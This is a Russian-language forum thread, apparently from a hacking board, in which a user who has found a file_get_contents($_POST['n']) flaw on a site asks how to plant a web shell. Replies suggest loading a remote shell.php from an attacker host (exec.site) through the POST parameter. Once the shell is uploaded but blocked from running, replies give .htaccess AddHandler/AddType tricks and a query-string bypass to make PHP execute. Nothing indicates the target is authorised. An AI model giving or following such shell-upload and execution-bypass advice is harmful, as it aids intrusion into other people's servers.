На изучаемом сайте найдена уязвимость: file_get_contents($_POST['n']) можно ли как-то залить шел или выполнить sql запрос? Спасибо.
Например вот так: site/?n=http://exec.site/shell.php в shell.php <?php mkdir('xack', 0777); самое простое только post запросом, не get. Это не трудно
Задил шелл, но тут проблемка. В папке где залит шелл, нельзя выполнять команды php, то есть файлы с расширением php нельзя запустить
Шел то залился, только он не запускуется,ьак как нельзя php файлы запускать. php2, php3 и тог далее тоже не помогает. Как еще можно запустить шелл?
Да в другие папкм также получается. На гугле прочитал, что можно как то через .htaccess дать доступ к php файлам
В Гугле: addhandler htaccess AddHandler application/x-httpd-php .расширение AddType application/x-httpd-php .php . расширение
можно воспользоваться методом [тут цензура] , для обхода кеширования сеошники добавляют такие веши app.css?v=12345 , такой запрос долетит до апача хотя в целом ситуация очень редкая, расширение файла которое подхватывается nginx'ом и выполняется на бекенде..